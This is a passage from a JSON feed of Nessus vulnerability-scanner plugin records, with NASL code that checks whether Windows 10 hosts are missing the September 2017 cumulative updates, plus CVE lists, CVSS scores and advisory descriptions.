"CVE-2017-8754", "CVE-2017-8755", "CVE-2017-8756", "CVE-2017-8757", "CVE-2017-8759"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038783.NASL", "href": "https://www.tenable.com/plugins/nessus/103129", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103129);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8660\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8702\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8738\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8752\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8755\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11766\"\n );\n script_xref(name:\"MSKB\", value:\"4038783\");\n script_xref(name:\"MSFT\", value:\"MS17-4038783\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4038783: Windows 10 Version 1511 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038783.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.(CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system.\n (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. \n (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system.\n (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality.\n (CVE-2017-8702)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system.(CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights.(CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.(CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8660, CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8738, CVE-2017-8752, CVE-2017-8753,\n CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038783/windows-10-update-kb4038783\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?15cd901b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038783.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038783');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038783])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:35:02", "description": "The remote Windows host is missing security update 4038782.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code execution vulnerability exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's implementation of the Bluetooth stack. An attacker who successfully exploited this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer. The attacker can then monitor and read the traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when Microsoft Edge improperly handles clipboard events. For an attack to be successful, an attacker must persuade a user to visit a malicious website and leave it open during clipboard activities. The update addresses the vulnerability by changing how Microsoft Edge handles clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. The update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.(CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.(CVE-2017-8683)\n\n - A memory corruption vulnerability exists in the Windows Server DHCP service when an attacker sends specially crafted packets to a DHCP failover server. An attacker who successfully exploited the vulnerability could either run arbitrary code on the DHCP failover server or cause the DHCP service to become nonresponsive.\n (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the memory address of a kernel object.(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability.(CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when Windows Shell does not properly validate file copy destinations. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system.\n (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality.\n (CVE-2017-8702)\n\n - A denial of service vulnerability exists when Microsoft Hyper-V Virtual PCI on a host server fails to properly validate input from a privileged user on a guest operating system.\n input. (CVE-2017-8704)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the base address of the kernel driver from a compromised process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8711, CVE-2017-8712, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM Host Agent Service of Remote Desktop Virtual Host role when it fails to properly validate input from an authenticated user on a guest operating system.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709, CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights.(CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-8731, CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content. An attacker who successfully exploited this vulnerability could trick a user by redirecting the user to a specially crafted website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in Microsoft browsers due to improper parent domain verification in certain functionality. An attacker who successfully exploited the vulnerability could obtain specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session.(CVE-2017-8746)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8649, CVE-2017-8660, CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747, CVE-2017-8749)\n\n - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.(CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker who exploited the bypass could trick a user into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8738, CVE-2017-8752, CVE-2017-8753, CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way Microsoft Edge handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET framework could take control of an affected system.\n (CVE-2017-8759) \n - An information disclosure vulnerability exists in Microsoft browsers in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose files on a user's computer. (CVE-2017-8529)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-12T00:00:00", "type": "nessus", "title": "KB4038782: Windows 10 Version 1607 and Windows Server 2016 September 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0161", "CVE-2017-11764", "CVE-2017-11766", "CVE-2017-8529", "CVE-2017-8628", "CVE-2017-8643", "CVE-2017-8649", "CVE-2017-8660", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8686", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8692", "CVE-2017-8695", "CVE-2017-8699", "CVE-2017-8702", "CVE-2017-8704", "CVE-2017-8706", "CVE-2017-8707", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8711", "CVE-2017-8712", "CVE-2017-8713", "CVE-2017-8714", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8723", "CVE-2017-8728", "CVE-2017-8731", "CVE-2017-8733", "CVE-2017-8734", "CVE-2017-8735", "CVE-2017-8736", "CVE-2017-8737", "CVE-2017-8738", "CVE-2017-8741", "CVE-2017-8746", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8752", "CVE-2017-8753", "CVE-2017-8754", "CVE-2017-8755", "CVE-2017-8756", "CVE-2017-8757", "CVE-2017-8759"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038782.NASL", "href": "https://www.tenable.com/plugins/nessus/103128", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103128);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8649\",\n \"CVE-2017-8660\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8686\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8702\",\n \"CVE-2017-8704\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8711\",\n \"CVE-2017-8712\",\n \"CVE-2017-8713\",\n \"CVE-2017-8714\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8728\",\n \"CVE-2017-8731\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8738\",\n \"CVE-2017-8741\",\n \"CVE-2017-8746\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8752\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8755\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11764\",\n \"CVE-2017-11766\"\n );\n script_xref(name:\"MSKB\", value:\"4038782\");\n script_xref(name:\"MSFT\", value:\"MS17-4038782\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4038782: Windows 10 Version 1607 and Windows Server 2016 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038782.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.(CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the 